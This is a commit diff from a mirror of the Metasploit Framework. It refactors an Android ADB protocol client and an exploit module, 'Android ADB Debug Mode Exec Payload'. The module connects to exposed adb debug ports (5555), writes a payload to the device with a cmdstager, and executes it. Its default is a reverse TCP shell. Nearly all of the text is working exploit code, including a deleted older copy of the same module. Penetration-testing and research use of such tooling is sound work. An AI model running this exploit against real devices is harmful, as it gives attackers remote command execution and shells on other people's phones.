1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Last mile polish and tweaks.

This commit is contained in:
joev 2016-01-02 22:41:38 -06:00
parent 22aae81006
commit dcd36b74db
4 changed files with 23 additions and 100 deletions

View File

@ -28,6 +28,10 @@ class Client
ADB::Message::Close.new(local_id, response.arg0).send_recv(@sock) ADB::Message::Close.new(local_id, response.arg0).send_recv(@sock)
end end
def read_message
ADB::Message.read(@sock)
end
end # Client end # Client
end # ADB end # ADB

View File

@ -20,12 +20,6 @@ class Message
attr_accessor :arg1 attr_accessor :arg1
attr_accessor :data attr_accessor :data
def initialize
self.command = self.arg0 = self.arg1 = 0
self.command = self.class::COMMAND if defined?(self.class::COMMAND)
self.data = ""
end
def initialize(arg0, arg1, data) def initialize(arg0, arg1, data)
self.command = self.class::COMMAND if defined?(self.class::COMMAND) self.command = self.class::COMMAND if defined?(self.class::COMMAND)
self.arg0 = arg0 self.arg0 = arg0
@ -101,7 +95,7 @@ class Message
class Connect < Message class Connect < Message
COMMAND = "CNXN" COMMAND = "CNXN"
DEFAULT_VERSION = 0x01000000 DEFAULT_VERSION = 0x01000000
DEFAULT_MAXDATA = 256*1024 DEFAULT_MAXDATA = 4096
DEFAULT_IDENTITY = "host::" DEFAULT_IDENTITY = "host::"
def initialize(version=DEFAULT_VERSION, def initialize(version=DEFAULT_VERSION,
@ -109,6 +103,8 @@ class Message
system_identity_string=DEFAULT_IDENTITY) system_identity_string=DEFAULT_IDENTITY)
super super
end end
end end
class Auth < Message class Auth < Message

View File

@ -16,12 +16,12 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => 'Android ADB Debug Mode Exec Payload', 'Name' => 'Android ADB Debug Mode Exec Payload',
'Description' => %q{ 'Description' => %q{
Writes and spawns a native shell on an android device that is listening Writes and spawns a native payload on an android device that is listening
for adb debug messages. for adb debug messages.
}, },
'Author' => ['joev'], 'Author' => ['joev'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/reverse_tcp' }, 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },
'Platform' => 'linux', 'Platform' => 'linux',
'Arch' => ARCH_ALL, 'Arch' => ARCH_ALL,
'Targets' => [ ['Automatic', {}] ], 'Targets' => [ ['Automatic', {}] ],
@ -36,28 +36,23 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
begin setup_adb_connection do
connect device_info = @adb_client.connect.data
device_info = adb_client.connect
print_good "Detected device:\n#{device_info}" print_good "Detected device:\n#{device_info}"
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
ensure
disconnect
end end
Exploit::CheckCode::Unknown Exploit::CheckCode::Unknown
end end
def execute_command(cmd, opts) def execute_command(cmd, opts)
response = adb_client.exec_cmd(cmd) response = @adb_client.exec_cmd(cmd)
print_good "Command executed, response:\n #{response}" print_good "Command executed, response:\n #{response}"
end end
def exploit def exploit
begin setup_adb_connection do
print_status "Connecting to device..." device_data = @adb_client.connect
connect
device_data = adb_client.connect
print_good "Connected to device:\n#{device_data.data}" print_good "Connected to device:\n#{device_data.data}"
execute_cmdstager({ execute_cmdstager({
:flavor => :echo, :flavor => :echo,
@ -65,13 +60,18 @@ class Metasploit3 < Msf::Exploit::Remote
:prefix => '\\\\0', :prefix => '\\\\0',
:temp => datastore['WritableDir'] :temp => datastore['WritableDir']
}) })
end
end
def setup_adb_connection(&blk)
begin
print_status "Connecting to device..."
connect
@adb_client = Rex::Proto::ADB::Client.new(sock)
blk.call
ensure ensure
disconnect disconnect
end end
end end
def adb_client
@adb_client ||= Rex::Proto::ADB::Client.new(sock)
end
end end

View File

@ -1,77 +0,0 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/adb/client'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Android ADB Debug Mode Shell Access',
'Description' => %q{
Writes and spawns a native shell on an android device that is listening
for adb debug messages.
},
'Author' => ['joev'],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/reverse_tcp' },
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 2016'
))
register_options([
Opt::RPORT(5555),
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/'])
], self.class)
end
def check
begin
connect
device_info = adb_client.connect
print_good "Detected device:\n#{device_info}"
return Exploit::CheckCode::Vulnerable
ensure
disconnect
end
Exploit::CheckCode::Unknown
end
def execute_command(cmd, opts)
response = adb_client.exec_cmd(cmd)
print_good "Command executed, response:\n #{response}"
end
def exploit
begin
print_status "Connecting to device..."
connect
device_data = adb_client.connect
print_good "Connected to device:\n#{device_data.data}"
execute_cmdstager({
:flavor => :echo,
:enc_format => :octal,
:prefix => '\\\\0',
:temp => datastore['WritableDir']
})
ensure
disconnect
end
end
def adb_client
@adb_client ||= Rex::Proto::ADB::Client.new(sock)
end
end